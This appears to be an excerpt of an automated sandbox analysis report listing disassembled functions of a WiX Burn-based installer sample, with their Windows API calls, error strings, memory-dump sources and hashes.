                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,007E6F28,?), ref: 007E6A0B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A18
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A60
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A6C
                                                                                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6AA6
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6AB0
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 007E6B67
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 007E6B71
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                              • String ID: (o~$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                              • API String ID: 971853308-587502988
                                                                                                                                                              • Opcode ID: 88e5f013cf3c6cb153a6ad073bd5e4f852cb4409927eccd6220a8e5d31370642
                                                                                                                                                              • Instruction ID: 3a5069a708a6ae49f471ae73ddfccf556cdf582ff0782397f10a69b278ec91e2
                                                                                                                                                              • Opcode Fuzzy Hash: 88e5f013cf3c6cb153a6ad073bd5e4f852cb4409927eccd6220a8e5d31370642
                                                                                                                                                              • Instruction Fuzzy Hash: 0D41B5B2E427659BD7219AA68C45FAFBBA8EF18760F118035FD11FB241D778DC0086A0
                                                                                                                                                              Function 007CF585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,007D04DF,InstallerVersion,InstallerVersion,00000000,007D04DF,InstallerName,InstallerName,00000000,007D04DF,Date,InstalledDate,00000000,007D04DF,LogonUser), ref: 007CF733
                                                                                                                                                                • Part of subcall function 008014F4: RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseValue
                                                                                                                                                              • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                              • API String ID: 3132538880-2703781546
                                                                                                                                                              • Opcode ID: b3201b5dde9c716661e171785838c3f348e685519e57a85937381864775ff699
                                                                                                                                                              • Instruction ID: e4528ed43deb96099bfbe7c1e587ebe89ae26cb11e7e996d6fff6baa74b9d827
                                                                                                                                                              • Opcode Fuzzy Hash: b3201b5dde9c716661e171785838c3f348e685519e57a85937381864775ff699
                                                                                                                                                              • Instruction Fuzzy Hash: BA418671A40A65F6CF2296548C06FEF7B6AFF10B20F15016CF910F63A1C7699E60A685
                                                                                                                                                              Function 007DE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 007DE7FF
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 007DE82B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE836
                                                                                                                                                              • CreateWindowExW.USER32(00000080,00819E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 007DE89D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE8A7
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 007DE945
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                              • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                              • API String ID: 213125376-288575659
                                                                                                                                                              • Opcode ID: e6b771e6484b41b455862e8279b3bf161a28e7ec1b46594ed2ea463cc38fbcfa
                                                                                                                                                              • Instruction ID: 5a025db65b3f11860dabc91f9f35c0234760079584206c53f7406595ddf6efba
                                                                                                                                                              • Opcode Fuzzy Hash: e6b771e6484b41b455862e8279b3bf161a28e7ec1b46594ed2ea463cc38fbcfa
                                                                                                                                                              • Instruction Fuzzy Hash: 5741C472A01215EFDB619BA0DC45ADEBFB8FF04720F214126F915EA340D734A940DBA1
                                                                                                                                                              Function 007EC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC9AD
                                                                                                                                                              • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 007EC7B4
                                                                                                                                                              • Failed to copy download source for passthrough pseudo bundle., xrefs: 007EC98F
                                                                                                                                                              • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 007ECAAC
                                                                                                                                                              • Failed to copy local source path for passthrough pseudo bundle., xrefs: 007EC9B7
                                                                                                                                                              • Failed to copy key for passthrough pseudo bundle., xrefs: 007EC988
                                                                                                                                                              • Failed to copy key for passthrough pseudo bundle payload., xrefs: 007EC9C5
                                                                                                                                                              • Failed to recreate command-line arguments., xrefs: 007ECA43
                                                                                                                                                              • Failed to copy filename for passthrough pseudo bundle., xrefs: 007EC9BE
                                                                                                                                                              • pseudobundle.cpp, xrefs: 007EC7A8, 007EC9A1, 007EC9DB
                                                                                                                                                              • Failed to copy install arguments for passthrough bundle package, xrefs: 007ECA62
                                                                                                                                                              • Failed to copy related arguments for passthrough bundle package, xrefs: 007ECA82
                                                                                                                                                              • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC9E7
                                                                                                                                                              • Failed to copy cache id for passthrough pseudo bundle., xrefs: 007ECA05
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                              • API String ID: 1357844191-115096447
                                                                                                                                                              • Opcode ID: 3bb51db7263fb76beef53eda0ced1fff2906cece2c48ae9be086069e93405caf
                                                                                                                                                              • Instruction ID: f665da568d93e18f5fdb3a2e6adbbdfbae3a55765e73e09f30a2ac1e0411b072
                                                                                                                                                              • Opcode Fuzzy Hash: 3bb51db7263fb76beef53eda0ced1fff2906cece2c48ae9be086069e93405caf
                                                                                                                                                              • Instruction Fuzzy Hash: F8B16879A01656EFCB12DF28C881F55BBA5FF08710F108169ED14AB352CB39E862DF90
                                                                                                                                                              Function 007EDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 007EDE61
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create BITS job., xrefs: 007EDEF0
                                                                                                                                                              • Failed to add file to BITS job., xrefs: 007EDF2E
                                                                                                                                                              • Failed to download BITS job., xrefs: 007EDFF8
                                                                                                                                                              • Failed to set credentials for BITS job., xrefs: 007EDF0F
                                                                                                                                                              • Failed to set callback interface for BITS job., xrefs: 007EDF99
                                                                                                                                                              • Failed to copy download URL., xrefs: 007EDEA8
                                                                                                                                                              • bitsengine.cpp, xrefs: 007EDE77, 007EDF6A
                                                                                                                                                              • Failed while waiting for BITS download., xrefs: 007EE012
                                                                                                                                                              • Failed to complete BITS job., xrefs: 007EE00B
                                                                                                                                                              • Failed to initialize BITS job callback., xrefs: 007EDF82
                                                                                                                                                              • Falied to start BITS job., xrefs: 007EE019
                                                                                                                                                              • Invalid BITS engine URL: %ls, xrefs: 007EDE83
                                                                                                                                                              • Failed to create BITS job callback., xrefs: 007EDF74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                              • API String ID: 1659193697-2382896028
                                                                                                                                                              • Opcode ID: cfe20d1281379cfdd9e8908fb7cb6b43d92c958493734cdb34527e1ca4ff35d6
                                                                                                                                                              • Instruction ID: 4fcb309297358376ab23242866db3e4a81a15feb76bd29dce54d45588e771421
                                                                                                                                                              • Opcode Fuzzy Hash: cfe20d1281379cfdd9e8908fb7cb6b43d92c958493734cdb34527e1ca4ff35d6
                                                                                                                                                              • Instruction Fuzzy Hash: 64612531A02265EBCB319B95C885E5E7BB4EF0C720B214556FC04EF351E7B8DD00AB90
                                                                                                                                                              Function 007CBC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CBCE5
                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 007CBDF2
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 007CBDFC
                                                                                                                                                              • WaitForInputIdle.USER32(?,?), ref: 007CBE50
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 007CBE9B
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 007CBEA8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                                              • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                                                              • API String ID: 155678114-2737401750
                                                                                                                                                              • Opcode ID: 6493d194d7e58d673fbd994605d9bf064df6255677c090cbac8197f7f090b2a1
                                                                                                                                                              • Instruction ID: 01d2fb5af9b2bbca9d1f6c9e3963193525fff5d1442f985aebdab94a1448fcab
                                                                                                                                                              • Opcode Fuzzy Hash: 6493d194d7e58d673fbd994605d9bf064df6255677c090cbac8197f7f090b2a1
                                                                                                                                                              • Instruction Fuzzy Hash: C2512972D0061AFBCF21AA94CC46EAEBB78FF04710F14856DFA15B2251D7399E109B91
                                                                                                                                                              Function 007CA28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA2B3
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA30E
                                                                                                                                                              • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 007CA32F
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 007CA405
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to format key string., xrefs: 007CA2BE
                                                                                                                                                              • search.cpp, xrefs: 007CA360
                                                                                                                                                              • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA3DD
                                                                                                                                                              • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA37A
                                                                                                                                                              • Failed to open registry key. Key = '%ls', xrefs: 007CA3C7
                                                                                                                                                              • Failed to query registry key value., xrefs: 007CA36A
                                                                                                                                                              • Failed to set variable., xrefs: 007CA3BD
                                                                                                                                                              • Registry key not found. Key = '%ls', xrefs: 007CA396
                                                                                                                                                              • Failed to format value string., xrefs: 007CA319
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16$CloseQueryValue
                                                                                                                                                              • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                              • API String ID: 2702208347-46557908
                                                                                                                                                              • Opcode ID: 72e65f30718c20f2e712f9130c4ec326f39209dfeafb6d41b020e26dc47bfb90
                                                                                                                                                              • Instruction ID: 36af93080ab775d58ccf86058948f36c0844b6e6a752a9688939e80f933dd2fa
                                                                                                                                                              • Opcode Fuzzy Hash: 72e65f30718c20f2e712f9130c4ec326f39209dfeafb6d41b020e26dc47bfb90
                                                                                                                                                              • Instruction Fuzzy Hash: BA41D632D40128BBDB625A94CC0AFAFBF64FB44711F10426DF914F6192D7399E10EB92
                                                                                                                                                              Function 007CB208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,007CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB210
                                                                                                                                                              • GetLastError.KERNEL32(?,007CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB21C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorHandleLastModule
                                                                                                                                                              • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                                                              • API String ID: 4242514867-926796631
                                                                                                                                                              • Opcode ID: 02c0a8e83d4d23a64084f71854932d6d556346701fdef452546461ec0ccac7b6
                                                                                                                                                              • Instruction ID: 93fbf1309e54fad290f608445df6434f24b8f9d2103a574cde8be1d2ba849e6b
                                                                                                                                                              • Opcode Fuzzy Hash: 02c0a8e83d4d23a64084f71854932d6d556346701fdef452546461ec0ccac7b6
                                                                                                                                                              • Instruction Fuzzy Hash: 12411532280620E7C7711A91CC8BF6B6354FB85B30F75852DF9119F2C2D76DC84282E5
                                                                                                                                                              Function 007C694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 007C699B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C69A5
                                                                                                                                                              • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 007C69E8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C69F2
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 007C6B03
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                              • API String ID: 3057421322-109962352
                                                                                                                                                              • Opcode ID: 8f577b4805a9d219ddffa3d11b4e8a77ecaa203c4906d7fd692352ca087853b6
                                                                                                                                                              • Instruction ID: 4a65ab81387dc432d5553cd397d0988689ee840bc260ce8c88e7f0df01ad66e9
                                                                                                                                                              • Opcode Fuzzy Hash: 8f577b4805a9d219ddffa3d11b4e8a77ecaa203c4906d7fd692352ca087853b6
                                                                                                                                                              • Instruction Fuzzy Hash: 3C4183729412399BDB319B658C49FEE7BA4FB08710F00819DE948F6291E7798E40CBD1
                                                                                                                                                              Function 007C48EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,007C5466,?,?,?,?), ref: 007C4920
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007C5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C4931
                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C4A6E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,007C5466,?,?,?,?,?,?,?,?,?,?,?), ref: 007C4A77
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set elevated pipe into thread local storage for logging., xrefs: 007C49A8
                                                                                                                                                              • Failed to allocate thread local storage for logging., xrefs: 007C495F
                                                                                                                                                              • Failed to create the message window., xrefs: 007C49CC
                                                                                                                                                              • comres.dll, xrefs: 007C49DD
                                                                                                                                                              • Failed to connect to unelevated process., xrefs: 007C4916
                                                                                                                                                              • engine.cpp, xrefs: 007C4955, 007C499E
                                                                                                                                                              • Failed to pump messages from parent process., xrefs: 007C4A42
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                                              • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                                                              • API String ID: 687263955-1790235126
                                                                                                                                                              • Opcode ID: 8bcd5de4a1427b26fa2357097a1f5fc9f65163f1153edf8393d27e4a530d0ce7
                                                                                                                                                              • Instruction ID: f681b94f66a2df42c88111638daf2b93635e35498a05b880d9d1c20fc9c1e65d
                                                                                                                                                              • Opcode Fuzzy Hash: 8bcd5de4a1427b26fa2357097a1f5fc9f65163f1153edf8393d27e4a530d0ce7
                                                                                                                                                              • Instruction Fuzzy Hash: D3418573940625FBC7529BA4CC59FEFBB6CFF04710F01422EBA15E6250DB39A91096E1
                                                                                                                                                              Function 007D3B4E Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 130COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 007D3BA2
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 007D3BAC
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 007D3C15
                                                                                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 007D3C1C
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 007D3CA6
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get length of temp folder., xrefs: 007D3C06
                                                                                                                                                              • Failed to get temp folder., xrefs: 007D3BDA
                                                                                                                                                              • Failed to format session id as a string., xrefs: 007D3C4A
                                                                                                                                                              • %u\, xrefs: 007D3C36
                                                                                                                                                              • Failed to get length of session id string., xrefs: 007D3C71
                                                                                                                                                              • Failed to copy temp folder., xrefs: 007D3CCF
                                                                                                                                                              • crypt32.dll, xrefs: 007D3B61
                                                                                                                                                              • logging.cpp, xrefs: 007D3BD0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                                              • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
